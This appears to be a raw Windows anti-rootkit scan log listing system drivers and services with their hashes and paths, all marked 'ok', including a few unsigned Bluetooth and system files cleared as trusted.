15:59:49.0548 0x42d8 [ 1538831CF8AD2979A04C423779465827, E1729B0CC4CEEE494A0B8817A8E98FF232E3A32FB023566EF0BC71A090262C0C ] lltdio C:\Windows\system32\DRIVERS\lltdio.sys
15:59:49.0611 0x42d8 lltdio - ok
15:59:49.0626 0x42d8 [ C1185803384AB3FEED115F79F109427F, 0414FE73532DCAB17E906438A14711E928CECCD5F579255410C62984DD652700 ] lltdsvc C:\Windows\System32\lltdsvc.dll
15:59:49.0673 0x42d8 lltdsvc - ok
15:59:49.0704 0x42d8 [ F993A32249B66C9D622EA5592A8B76B8, EE64672A990C6145DC5601E2B8CDBE089272A72732F59AF9865DCBA8B1717E70 ] lmhosts C:\Windows\System32\lmhsvc.dll
15:59:49.0735 0x42d8 lmhosts - ok
15:59:49.0798 0x42d8 [ EE41A1785162D3C1DB7A574D9BC2019D, CB7A1B10B0B61857B1A3B4C315CF4C3F8C2AB10238EF1018041B7EA33A581DB8 ] LMS C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
15:59:49.0829 0x42d8 LMS - ok
15:59:49.0876 0x42d8 [ 1A93E54EB0ECE102495A51266DCDB6A6, DB6AA86AA36C3A7988BE96E87B5D3251BE7617C54EE8F894D9DC2E267FE3255B ] LSI_FC C:\Windows\system32\drivers\lsi_fc.sys
15:59:49.0891 0x42d8 LSI_FC - ok
15:59:49.0923 0x42d8 [ 1047184A9FDC8BDBFF857175875EE810, F2251EDB7736A26D388A0C5CC2FE5FB9C5E109CBB1E3800993554CB21D81AE4B ] LSI_SAS C:\Windows\system32\drivers\lsi_sas.sys
15:59:49.0938 0x42d8 LSI_SAS - ok
15:59:49.0938 0x42d8 [ 30F5C0DE1EE8B5BC9306C1F0E4A75F93, 88D5740A4E9CC3FA80FA18035DAB441BDC5A039622D666BFDAA525CC9686BD06 ] LSI_SAS2 C:\Windows\system32\drivers\lsi_sas2.sys
15:59:49.0954 0x42d8 LSI_SAS2 - ok
15:59:49.0969 0x42d8 [ 0504EACAFF0D3C8AED161C4B0D369D4A, 4D272237C189646F5C80822FD3CBA7C2728E482E2DAAF7A09C8AEF811C89C54D ] LSI_SCSI C:\Windows\system32\drivers\lsi_scsi.sys
15:59:49.0969 0x42d8 LSI_SCSI - ok
15:59:49.0985 0x42d8 [ 43D0F98E1D56CCDDB0D5254CFF7B356E, 5BA498183B5C4996C694CB0A9A6B66CE6C7A460F6C91BEB9F305486FCC3B7B22 ] luafv C:\Windows\system32\drivers\luafv.sys
15:59:50.0001 0x42d8 luafv - ok
15:59:50.0032 0x42d8 [ 0BE09CD858ABF9DF6ED259D57A1A1663, 2FD28889B93C8E801F74C1D0769673A461671E0189D0A22C94509E3F0EEB7428 ] Mcx2Svc C:\Windows\system32\Mcx2Svc.dll
15:59:50.0047 0x42d8 Mcx2Svc - ok
15:59:50.0063 0x42d8 [ A55805F747C6EDB6A9080D7C633BD0F4, 2DA0E83BF3C8ADEF6F551B6CC1C0A3F6149CDBE6EC60413BA1767C4DE425A728 ] megasas C:\Windows\system32\drivers\megasas.sys
15:59:50.0063 0x42d8 megasas - ok
15:59:50.0079 0x42d8 [ BAF74CE0072480C3B6B7C13B2A94D6B3, 85CBB4949C090A904464F79713A3418338753D20D7FB811E68F287FDAC1DD834 ] MegaSR C:\Windows\system32\drivers\MegaSR.sys
15:59:50.0094 0x42d8 MegaSR - ok
15:59:50.0125 0x42d8 [ 6B01B7414A105B9E51652089A03027CF, 9B113DC22F7D0D0B376E577C6D7083F9EDC09BBFE47726393E16D4FDAAAE21FE ] MEIx64 C:\Windows\system32\drivers\HECIx64.sys
15:59:50.0141 0x42d8 MEIx64 - ok
15:59:50.0172 0x42d8 [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] MMCSS C:\Windows\system32\mmcss.dll
15:59:50.0219 0x42d8 MMCSS - ok
15:59:50.0235 0x42d8 [ 800BA92F7010378B09F9ED9270F07137, 94F9AF9E1BE80AE6AC39A2A74EF9FAB115DCAACC011D07DFA8D6A1DDC8A93342 ] Modem C:\Windows\system32\drivers\modem.sys
15:59:50.0250 0x42d8 Modem - ok
15:59:50.0281 0x42d8 [ B03D591DC7DA45ECE20B3B467E6AADAA, 701FB0CAD8138C58507BE28845D3E24CE269A040737C29885944A0D851238732 ] monitor C:\Windows\system32\DRIVERS\monitor.sys
15:59:50.0297 0x42d8 monitor - ok
15:59:50.0313 0x42d8 [ 7D27EA49F3C1F687D357E77A470AEA99, 7FE7CAF95959F127C6D932C01D539C06D80273C49A09761F6E8331C05B1A7EE7 ] mouclass C:\Windows\system32\DRIVERS\mouclass.sys
15:59:50.0328 0x42d8 mouclass - ok
15:59:50.0344 0x42d8 [ D3BF052C40B0C4166D9FD86A4288C1E6, 5E65264354CD94E844BF1838CA1B8E49080EFA34605A32CF2F6A47A2B97FC183 ] mouhid C:\Windows\system32\DRIVERS\mouhid.sys
15:59:50.0359 0x42d8 mouhid - ok
15:59:50.0375 0x42d8 [ 32E7A3D591D671A6DF2DB515A5CBE0FA, 47CED0B9067AE8BF5EEF60B17ADEE5906BEDCC56E4CB460B7BFBC12BB9A69E63 ] mountmgr C:\Windows\system32\drivers\mountmgr.sys
15:59:50.0375 0x42d8 mountmgr - ok
15:59:50.0453 0x42d8 [ 6439D1E559D08BD8A1465A8943357053, 0E300508C22D12FBA3BE566B722F574CBE1B4A1A305356B92B8EA8B86267071B ] MpFilter C:\Windows\system32\DRIVERS\MpFilter.sys
15:59:50.0484 0x42d8 MpFilter - ok
15:59:50.0500 0x42d8 [ A44B420D30BD56E145D6A2BC8768EC58, B1E4DCA5A1008FA7A0492DC091FB2B820406AE13FD3D44F124E89B1037AF09B8 ] mpio C:\Windows\system32\drivers\mpio.sys
15:59:50.0515 0x42d8 mpio - ok
15:59:50.0515 0x42d8 [ 6C38C9E45AE0EA2FA5E551F2ED5E978F, 5A3FA2F110029CB4CC4384998EDB59203FDD65EC45E01B897FB684F8956EAD20 ] mpsdrv C:\Windows\system32\drivers\mpsdrv.sys
15:59:50.0547 0x42d8 mpsdrv - ok
15:59:50.0609 0x42d8 [ 54FFC9C8898113ACE189D4AA7199D2C1, 65F585C87F3F710FD5793FDFA96B740AD8D4317B0C120F4435CCF777300EA4F2 ] MpsSvc C:\Windows\system32\mpssvc.dll
15:59:50.0656 0x42d8 MpsSvc - ok
15:59:50.0703 0x42d8 [ 1A4F75E63C9FB84B85DFFC6B63FD5404, 01AFA6DBB4CDE55FE4EA05BBE8F753A4266F8D072EA1EE01DB79F5126780C21F ] MRxDAV C:\Windows\system32\drivers\mrxdav.sys
15:59:50.0703 0x42d8 MRxDAV - ok
15:59:50.0718 0x42d8 [ A5D9106A73DC88564C825D317CAC68AC, 0457B2AEA4E05A91D0E43F317894A614434D8CEBE35020785387F307E231FBE4 ] mrxsmb C:\Windows\system32\DRIVERS\mrxsmb.sys
15:59:50.0734 0x42d8 mrxsmb - ok
15:59:50.0749 0x42d8 [ D711B3C1D5F42C0C2415687BE09FC163, 9B3013AC60BD2D0FF52086658BA5FF486ADE15954A552D7DD590580E8BAE3EFF ] mrxsmb10 C:\Windows\system32\DRIVERS\mrxsmb10.sys
15:59:50.0765 0x42d8 mrxsmb10 - ok
15:59:50.0765 0x42d8 [ 9423E9D355C8D303E76B8CFBD8A5C30C, 220B33F120C2DD937FE4D5664F4B581DC0ACF78D62EB56B7720888F67B9644CC ] mrxsmb20 C:\Windows\system32\DRIVERS\mrxsmb20.sys
15:59:50.0781 0x42d8 mrxsmb20 - ok
15:59:50.0812 0x42d8 [ C25F0BAFA182CBCA2DD3C851C2E75796, 643E158A0948DF331807AEAA391F23960362E46C0A0CF6D22A99020EAE7B10F8 ] msahci C:\Windows\system32\drivers\msahci.sys
15:59:50.0827 0x42d8 msahci - ok
15:59:50.0843 0x42d8 [ DB801A638D011B9633829EB6F663C900, B34FD33A215ACCF2905F4B7D061686CDB1CB9C652147AF56AE14686C1F6E3C74 ] msdsm C:\Windows\system32\drivers\msdsm.sys
15:59:50.0859 0x42d8 msdsm - ok
15:59:50.0874 0x42d8 [ DE0ECE52236CFA3ED2DBFC03F28253A8, 2FBBEC4CACB5161F68D7C2935852A5888945CA0F107CF8A1C01F4528CE407DE3 ] MSDTC C:\Windows\System32\msdtc.exe
15:59:50.0890 0x42d8 MSDTC - ok
15:59:50.0905 0x42d8 [ AA3FB40E17CE1388FA1BEDAB50EA8F96, 69F93E15536644C8FD679A20190CFE577F4985D3B1B4A4AA250A168615AE1E99 ] Msfs C:\Windows\system32\drivers\Msfs.sys
15:59:50.0921 0x42d8 Msfs - ok
15:59:50.0937 0x42d8 [ F9D215A46A8B9753F61767FA72A20326, 6F76642B45E0A7EF6BCAB8B37D55CCE2EAA310ED07B76D43FCB88987C2174141 ] mshidkmdf C:\Windows\System32\drivers\mshidkmdf.sys
15:59:50.0952 0x42d8 mshidkmdf - ok
15:59:50.0968 0x42d8 [ D916874BBD4F8B07BFB7FA9B3CCAE29D, B229DA150713DEDBC4F05386C9D9DC3BC095A74F44F3081E88311AB73BC992A1 ] msisadrv C:\Windows\system32\drivers\msisadrv.sys
15:59:50.0983 0x42d8 msisadrv - ok
15:59:50.0999 0x42d8 [ 808E98FF49B155C522E6400953177B08, F873F5BFF0984C5165DF67E92874D3F6EB8D86F9B5AD17013A0091CA33A1A3D5 ] MSiSCSI C:\Windows\system32\iscsiexe.dll
15:59:51.0030 0x42d8 MSiSCSI - ok
15:59:51.0030 0x42d8 msiserver - ok
15:59:51.0061 0x42d8 [ 49CCF2C4FEA34FFAD8B1B59D49439366, E5752EA57C7BDAD5F53E3BC441A415E909AC602CAE56234684FB8789A20396C7 ] MSKSSRV C:\Windows\system32\drivers\MSKSSRV.sys
15:59:51.0077 0x42d8 MSKSSRV - ok
15:59:51.0124 0x42d8 [ F0D5494D8B177C37E16966262F5D0F68, DD63427DFFD9DD2BEC8336F6AD1BEFE347012331631DC5FEC65E83B1EACDBC67 ] MsMpSvc c:\Program Files\Microsoft Security Client\MsMpEng.exe
15:59:51.0139 0x42d8 MsMpSvc - ok
15:59:51.0139 0x42d8 [ BDD71ACE35A232104DDD349EE70E1AB3, 27464A66868513BE6A01B75D7FC5B0D6B71842E4E20CE3F76B15C071A0618BBB ] MSPCLOCK C:\Windows\system32\drivers\MSPCLOCK.sys
15:59:51.0155 0x42d8 MSPCLOCK - ok
15:59:51.0171 0x42d8 [ 4ED981241DB27C3383D72092B618A1D0, E12F121E641249DB3491141851B59E1496F4413EDF58E863388F1C229838DFCC ] MSPQM C:\Windows\system32\drivers\MSPQM.sys
15:59:51.0186 0x42d8 MSPQM - ok
15:59:51.0217 0x42d8 [ 759A9EEB0FA9ED79DA1FB7D4EF78866D, 64E3BC613EC4872B1B344CBF71EE15BE195592E3244C1EE099C6F8B95A40F133 ] MsRPC C:\Windows\system32\drivers\MsRPC.sys
15:59:51.0233 0x42d8 MsRPC - ok
15:59:51.0233 0x42d8 [ 0EED230E37515A0EAEE3C2E1BC97B288, B1D8F8A75006B6E99214CA36D27A8594EF8D952F315BEB201E9BAC9DE3E64D42 ] mssmbios C:\Windows\system32\drivers\mssmbios.sys
15:59:51.0249 0x42d8 mssmbios - ok
15:59:51.0264 0x42d8 [ 2E66F9ECB30B4221A318C92AC2250779, DF175E1AB6962303E57F26DAE5C5C1E40B8640333F3E352A64F6A5F1301586CD ] MSTEE C:\Windows\system32\drivers\MSTEE.sys
15:59:51.0295 0x42d8 MSTEE - ok
15:59:51.0295 0x42d8 [ 7EA404308934E675BFFDE8EDF0757BCD, 306CD02D89CFCFE576242360ED5F9EEEDCAFC43CD43B7D2977AE960F9AEC3232 ] MTConfig C:\Windows\system32\drivers\MTConfig.sys
15:59:51.0311 0x42d8 MTConfig - ok
15:59:51.0311 0x42d8 [ F9A18612FD3526FE473C1BDA678D61C8, 32F7975B5BAA447917F832D9E3499B4B6D3E90D73F478375D0B70B36C524693A ] Mup C:\Windows\system32\Drivers\mup.sys
15:59:51.0327 0x42d8 Mup - ok
15:59:51.0358 0x42d8 [ 582AC6D9873E31DFA28A4547270862DD, BD540499F74E8F59A020D935D18E36A3A97C1A6EC59C8208436469A31B16B260 ] napagent C:\Windows\system32\qagentRT.dll
15:59:51.0389 0x42d8 napagent - ok
15:59:51.0451 0x42d8 [ 1EA3749C4114DB3E3161156FFFFA6B33, 54C2E77BCE1037711A11313AC25B8706109098C10A31AA03AEB7A185E97800D7 ] NativeWifiP C:\Windows\system32\DRIVERS\nwifi.sys
15:59:51.0467 0x42d8 NativeWifiP - ok
15:59:51.0529 0x42d8 [ 760E38053BF56E501D562B70AD796B88, F856E81A975D44F8684A6F2466549CEEDFAEB3950191698555A93A1206E0A42D ] NDIS C:\Windows\system32\drivers\ndis.sys
15:59:51.0561 0x42d8 NDIS - ok
15:59:51.0592 0x42d8 [ 9F9A1F53AAD7DA4D6FEF5BB73AB811AC, D7E5446E83909AE25506BB98FBDD878A529C87963E3C1125C4ABAB25823572BC ] NdisCap C:\Windows\system32\DRIVERS\ndiscap.sys
15:59:51.0607 0x42d8 NdisCap - ok
15:59:51.0623 0x42d8 [ 30639C932D9FEF22B31268FE25A1B6E5, 32873D95339600F6EEFA51847D12C563FF01F320DC59055B242FA2887C99F9D6 ] NdisTapi C:\Windows\system32\DRIVERS\ndistapi.sys
15:59:51.0654 0x42d8 NdisTapi - ok
15:59:51.0670 0x42d8 [ 136185F9FB2CC61E573E676AA5402356, BA3AD0A33416DA913B4242C6BE8C3E5812AD2B20BA6C11DD3094F2E8EB56E683 ] Ndisuio C:\Windows\system32\DRIVERS\ndisuio.sys
15:59:51.0701 0x42d8 Ndisuio - ok
15:59:51.0701 0x42d8 [ 53F7305169863F0A2BDDC49E116C2E11, 881E9346D3C02405B7850ADC37E720990712EC9C666A0CE96E252A487FD2CE77 ] NdisWan C:\Windows\system32\DRIVERS\ndiswan.sys
15:59:51.0732 0x42d8 NdisWan - ok
15:59:51.0732 0x42d8 [ 015C0D8E0E0421B4CFD48CFFE2825879, 4242E2D42CCFC859B2C0275C5331798BC0BDA68E51CF4650B6E64B1332071023 ] NDProxy C:\Windows\system32\drivers\NDProxy.sys
15:59:51.0763 0x42d8 NDProxy - ok
15:59:51.0779 0x42d8 [ 86743D9F5D2B1048062B14B1D84501C4, DBF6D6A60AB774FCB0F464FF2D285A7521D0A24006687B243AB46B17D8032062 ] NetBIOS C:\Windows\system32\DRIVERS\netbios.sys
15:59:51.0810 0x42d8 NetBIOS - ok
15:59:51.0826 0x42d8 [ 09594D1089C523423B32A4229263F068, 7426A9B8BA27D3225928DDEFBD399650ABB90798212F56B7D12158AC22CCCE37 ] NetBT C:\Windows\system32\DRIVERS\netbt.sys
15:59:51.0841 0x42d8 NetBT - ok
15:59:51.0873 0x42d8 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] Netlogon C:\Windows\system32\lsass.exe
15:59:51.0873 0x42d8 Netlogon - ok
15:59:51.0904 0x42d8 [ 847D3AE376C0817161A14A82C8922A9E, 37AE692B3481323134125EF58F2C3CBC20177371AF2F5874F53DD32A827CB936 ] Netman C:\Windows\System32\netman.dll
15:59:51.0935 0x42d8 Netman - ok
15:59:51.0997 0x42d8 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetMsmqActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
15:59:52.0013 0x42d8 NetMsmqActivator - ok
15:59:52.0029 0x42d8 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetPipeActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
15:59:52.0044 0x42d8 NetPipeActivator - ok
15:59:52.0060 0x42d8 [ 5F28111C648F1E24F7DBC87CDEB091B8, 2E8645285921EDB98BB2173E11E57459C888D52E80D85791D169C869DE8813B9 ] netprofm C:\Windows\System32\netprofm.dll
15:59:52.0091 0x42d8 netprofm - ok
15:59:52.0107 0x42d8 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
15:59:52.0107 0x42d8 NetTcpActivator - ok
15:59:52.0107 0x42d8 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
15:59:52.0122 0x42d8 NetTcpPortSharing - ok
15:59:52.0153 0x42d8 [ 77889813BE4D166CDAB78DDBA990DA92, 2EF531AE502B943632EEC66A309A8BFCDD36120A5E1473F4AAF3C2393AD0E6A3 ] nfrd960 C:\Windows\system32\drivers\nfrd960.sys
15:59:52.0153 0x42d8 nfrd960 - ok
15:59:52.0216 0x42d8 [ F9EEFFC65C68A45001D1349E652B8B6F, E5F223129416083A12A85D48C65B2C8D1BF1124110399938E144308C89F9241D ] NisDrv C:\Windows\system32\DRIVERS\NisDrvWFP.sys
15:59:52.0231 0x42d8 NisDrv - ok
15:59:52.0247 0x42d8 [ 9690F420A99364C1E5C439914B0DE25C, 6C6E0B27C4255001FE5F1EAD911DE1A8BF922C405B0C8031A6BD253CEB1D02A6 ] NisSrv c:\Program Files\Microsoft Security Client\NisSrv.exe
15:59:52.0263 0x42d8 NisSrv - ok
15:59:52.0294 0x42d8 [ 8AD77806D336673F270DB31645267293, E23F324913554A23CD043DD27D4305AF62F48C0561A0FC7B7811E55B74B1BE79 ] NlaSvc C:\Windows\System32\nlasvc.dll
15:59:52.0309 0x42d8 NlaSvc - ok
15:59:52.0387 0x42d8 [ B1EF4686961986DFFB7FE8F18E6FCB5B, 562F144DAA8C2D6E4D55C7ABEF1DB52FC67F1A09E03CD700E27DFC3A4920E271 ] nlsX86cc C:\Windows\SysWOW64\nlssrv32.exe
15:59:52.0403 0x42d8 nlsX86cc - detected UnsignedFile.Multi.Generic ( 1 )
15:59:54.0977 0x42d8 Detect skipped due to KSN trusted
15:59:54.0977 0x42d8 nlsX86cc - ok
16:00:04.0446 0x42d8 WbioSrvc - ok
16:00:04.0462 0x42d8 [ 7368A2AFD46E5A4481D1DE9D14848EDD, 8039C478FC2D9F095F5883A4FA47F9E6EDF57CC88A4AA74F07C88445F90DED57 ] wcncsvc C:\Windows\System32\wcncsvc.dll
16:00:04.0477 0x42d8 wcncsvc - ok
16:00:04.0493 0x42d8 [ 20F7441334B18CEE52027661DF4A6129, 7B8E0247234B740FED2BE9B833E9CE8DD7453340123AB43F6B495A7E6A27B0DD ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
16:00:04.0509 0x42d8 WcsPlugInService - ok
16:00:04.0524 0x42d8 [ 72889E16FF12BA0F235467D6091B17DC, F2FD0BBD075E33608D93F350D216F97442AB89ABD540513C2D568C78096E12A8 ] Wd C:\Windows\system32\drivers\wd.sys
16:00:04.0540 0x42d8 Wd - ok
16:00:04.0571 0x42d8 [ A3D04EBF5227886029B4532F20D026F7, D90F7B9C176008675DA0B5FD7E4973CBC2A04172CEDF8FB7D3B3B4F27B5440D7 ] WDC_SAM C:\Windows\system32\DRIVERS\wdcsam64.sys
16:00:04.0602 0x42d8 WDC_SAM - ok
16:00:04.0665 0x42d8 [ E2C933EDBC389386EBE6D2BA953F43D8, AF1DEADD5F1267CCEBD226E8EEB971D1946EA6A5A9645A36F5D111F758AF2F07 ] Wdf01000 C:\Windows\system32\drivers\Wdf01000.sys
16:00:04.0696 0x42d8 Wdf01000 - ok
16:00:04.0711 0x42d8 [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiServiceHost C:\Windows\system32\wdi.dll
16:00:04.0711 0x42d8 WdiServiceHost - ok
16:00:04.0727 0x42d8 [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiSystemHost C:\Windows\system32\wdi.dll
16:00:04.0743 0x42d8 WdiSystemHost - ok
16:00:04.0774 0x42d8 [ 0EB0E5D22B1760F2DBCE632F2DD7A54D, B8A4CC62F88768947FB0A161CF9564DB28FD9C1C037B5475DF192982DE035C22 ] WebClient C:\Windows\System32\webclnt.dll
16:00:04.0789 0x42d8 WebClient - ok
16:00:04.0821 0x42d8 [ C749025A679C5103E575E3B48E092C43, B71171D07EE7AB085A24BF3A1072FF2CE7EA021AAE695F6A90640E6EE8EB55C1 ] Wecsvc C:\Windows\system32\wecsvc.dll
16:00:04.0852 0x42d8 Wecsvc - ok
16:00:04.0867 0x42d8 [ 7E591867422DC788B9E5BD337A669A08, 484E6BCCDF7ADCE9A1AACAD1BC7C7D7694B9E40FA90D94B14D80C607784F6C75 ] wercplsupport C:\Windows\System32\wercplsupport.dll
16:00:04.0883 0x42d8 wercplsupport - ok
16:00:04.0914 0x42d8 [ 6D137963730144698CBD10F202E9F251, A9F522A125158D94F540544CCD4DBF47B9DCE2EA878C33675AFE40F80E8F4979 ] WerSvc C:\Windows\System32\WerSvc.dll
16:00:04.0930 0x42d8 WerSvc - ok
16:00:04.0961 0x42d8 [ 611B23304BF067451A9FDEE01FBDD725, 0AF2734B978165FC6FD22B64862132CCE32528A21C698A49D176129446E099C8 ] WfpLwf C:\Windows\system32\DRIVERS\wfplwf.sys
16:00:04.0977 0x42d8 WfpLwf - ok
16:00:05.0008 0x42d8 [ 05ECAEC3E4529A7153B3136CEB49F0EC, 9995CB2CEC70A633EA33CBB0DEAD2BB28CB67132B41E9444BDAB9E75744C9A50 ] WIMMount C:\Windows\system32\drivers\wimmount.sys
16:00:05.0008 0x42d8 WIMMount - ok
16:00:05.0023 0x42d8 WinDefend - ok
16:00:05.0039 0x42d8 WinHttpAutoProxySvc - ok
16:00:05.0101 0x42d8 [ 19B07E7E8915D701225DA41CB3877306, D6555E8D276DBB11358246E0FE215F76F1FB358791C76B88D82C2A66A42DA19F ] Winmgmt C:\Windows\system32\wbem\WMIsvc.dll
16:00:05.0148 0x42d8 Winmgmt - ok
16:00:05.0226 0x42d8 [ BCB1310604AA415C4508708975B3931E, 9D943F086D454345153A0DD426B4432532A44FD87950386B186E1CAD2AC70565 ] WinRM C:\Windows\system32\WsmSvc.dll
16:00:05.0289 0x42d8 WinRM - ok
16:00:05.0351 0x42d8 [ FE88B288356E7B47B74B13372ADD906D, A16B166F6BB32EF9D2A142F27B9EC54CBC7B3AC915799783CF4C40E525BC9E03 ] WinUsb C:\Windows\system32\DRIVERS\WinUsb.sys
16:00:05.0367 0x42d8 WinUsb - ok
16:00:05.0413 0x42d8 [ 4FADA86E62F18A1B2F42BA18AE24E6AA, CE1683386886BF34862681A46199EA7E7FB4232A186047DA7FBD8EC240AF6726 ] Wlansvc C:\Windows\System32\wlansvc.dll
16:00:05.0445 0x42d8 Wlansvc - ok
16:00:05.0507 0x42d8 [ 06C8FA1CF39DE6A735B54D906BA791C6, D8FEC7DE227781CDA876904701B2AA995268F74DCD6CB34AA0296C557FC283B6 ] wlcrasvc C:\Program Files\Windows Live\Mesh\wlcrasvc.exe
16:00:05.0523 0x42d8 wlcrasvc - ok
16:00:05.0679 0x42d8 [ 2BACD71123F42CEA603F4E205E1AE337, 1FEF20554110371D738F462ECFFA999158EFEED02062414C58C1B61C422BF0B9 ] wlidsvc C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
16:00:05.0741 0x42d8 wlidsvc - ok
16:00:05.0772 0x42d8 [ F6FF8944478594D0E414D3F048F0D778, 6F75E0AE6127B33A92A88E59D4B048FD4C15F997807BE7BF0EFE76F95235B1D9 ] WmiAcpi C:\Windows\system32\DRIVERS\wmiacpi.sys
16:00:05.0803 0x42d8 WmiAcpi - ok
16:00:05.0835 0x42d8 [ 38B84C94C5A8AF291ADFEA478AE54F93, 1AC267AC73670BEA5F3785C9AD9DB146F8E993A862C843742B21FDB90D102B2A ] wmiApSrv C:\Windows\system32\wbem\WmiApSrv.exe
16:00:05.0850 0x42d8 wmiApSrv - ok
16:00:05.0881 0x42d8 WMPNetworkSvc - ok
16:00:05.0944 0x42d8 [ 58540037A4A3EEEEFA47C84100E1694F, 9BB055D008F1BC55E4361BBDB525CAD2E2E0ED7CFF1AA34A9BA7BEEDEA1A4B08 ] WMZuneComm C:\Program Files\Zune\WMZuneComm.exe
16:00:05.0975 0x42d8 WMZuneComm - ok
16:00:05.0991 0x42d8 [ 96C6E7100D724C69FCF9E7BF590D1DCA, 2E63C9B0893B4FC03B7A71BAEA6202D3D3DB1B52F3643467829B5A573FD7655B ] WPCSvc C:\Windows\System32\wpcsvc.dll
16:00:06.0006 0x42d8 WPCSvc - ok
16:00:06.0022 0x42d8 [ 93221146D4EBBF314C29B23CD6CC391D, C0750858A65BF51E210CD244C825C121D67E025CD2D2455139991AAC289A90FE ] WPDBusEnum C:\Windows\system32\wpdbusenum.dll
16:00:06.0037 0x42d8 WPDBusEnum - ok
16:00:06.0053 0x42d8 [ 6BCC1D7D2FD2453957C5479A32364E52, E48554D31FBDCF8F985C1C72524CAA9106F5B7CC2B79064F8F5E2562D517F090 ] ws2ifsl C:\Windows\system32\drivers\ws2ifsl.sys
16:00:06.0069 0x42d8 ws2ifsl - ok
16:00:06.0084 0x42d8 [ E8B1FE6669397D1772D8196DF0E57A9E, 39FE0819360719F756BD31A1884A0508A1E2371ACC723E25E005CBEC0A7B02FA ] wscsvc C:\Windows\system32\wscsvc.dll
16:00:06.0115 0x42d8 wscsvc - ok
16:00:06.0115 0x42d8 WSearch - ok
16:00:06.0209 0x42d8 [ 61FF576450CCC80564B850BC3FB6713A, B2843BC9E2F62D27DCF6787D063378926748CE75002BADA1873DCB5039883705 ] wuauserv C:\Windows\system32\wuaueng.dll
16:00:06.0271 0x42d8 wuauserv - ok
16:00:06.0303 0x42d8 [ AB886378EEB55C6C75B4F2D14B6C869F, D6C4602EB8F291DADEDF3CD211013D4AC752DDE7E799C2D8D74AA4F5477CAED6 ] WudfPf C:\Windows\system32\drivers\WudfPf.sys
16:00:06.0318 0x42d8 WudfPf - ok
16:00:06.0349 0x42d8 [ DDA4CAF29D8C0A297F886BFE561E6659, 94E5DD649B5D86FA1A7C7D30FCF9644D0EE048D312E626111458ADF66BFBE978 ] WUDFRd C:\Windows\system32\DRIVERS\WUDFRd.sys
16:00:06.0349 0x42d8 WUDFRd - ok
16:00:06.0365 0x42d8 [ B20F051B03A966392364C83F009F7D17, 88ECEB55AE91F58F592B96EBC10B572747D5A2F9B7629E8F371761E4F7408A65 ] wudfsvc C:\Windows\System32\WUDFSvc.dll
16:00:06.0381 0x42d8 wudfsvc - ok
16:00:06.0396 0x42d8 [ 04F82965C09CBDF646B487E145060301, 2CD8533EDBE24C3E42EB7550E20F8A2EB9E5E345B165DEF543163A6BC1FDD18B ] WwanSvc C:\Windows\System32\wwansvc.dll
16:00:06.0412 0x42d8 WwanSvc - ok
16:00:06.0693 0x42d8 [ D6EF205269C2A584AF6B56B9F95010F8, C414FF4805C5FE47E5B9E9694419AE08CBEA26ECEF1F977742B23AFA032CE8E1 ] ZuneNetworkSvc C:\Program Files\Zune\ZuneNss.exe
16:00:06.0973 0x42d8 ZuneNetworkSvc - ok
16:00:07.0005 0x42d8 [ 7A565AFE58F3822A9E622868E5CC0E5C, E09EF57D7739BF09EAF7A20199107D84F1290F9C34B9D3E6446A0215A8BE1990 ] ZuneWlanCfgSvc C:\Program Files\Zune\ZuneWlanCfgSvc.exe
16:00:07.0020 0x42d8 ZuneWlanCfgSvc - ok
16:00:07.0036 0x42d8 ================ Scan global ===============================
16:00:07.0192 0x42d8 [ Global ] - ok
16:00:07.0192 0x42d8 ================ Scan MBR ==================================
16:00:07.0207 0x42d8 [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0
16:00:07.0457 0x42d8 \Device\Harddisk0\DR0 - ok
16:00:07.0457 0x42d8 ================ Scan VBR ==================================
16:00:07.0457 0x42d8 [ 2EA9BF8CDE8B71F3CA2C1BC9FEF1EED1 ] \Device\Harddisk0\DR0\Partition1
16:00:07.0488 0x42d8 \Device\Harddisk0\DR0\Partition1 - ok
16:00:07.0488 0x42d8 ================ Scan generic autorun ======================
16:00:08.0206 0x42d8 [ 048FA2F7B7F5292ABD6FE52D360708AB, CD3E9897D706D2D3E7F4492432BC69182201FAB0E85C58683E82094C7AD5F303 ] C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
16:00:08.0237 0x42d8 AtherosBtStack - detected UnsignedFile.Multi.Generic ( 1 )
16:00:10.0811 0x42d8 Detect skipped due to KSN trusted
16:00:10.0811 0x42d8 AtherosBtStack - ok
16:00:10.0889 0x42d8 [ F282E6109982A4ABDD925BA3F6EE04AB, 1D8C98549D7A02F9228C3FB122A07F8E87ACE936FEC6FD3B5F517243F330E951 ] C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
16:00:10.0920 0x42d8 AthBtTray - detected UnsignedFile.Multi.Generic ( 1 )
16:00:13.0510 0x42d8 Detect skipped due to KSN trusted
16:00:13.0510 0x42d8 AthBtTray - ok
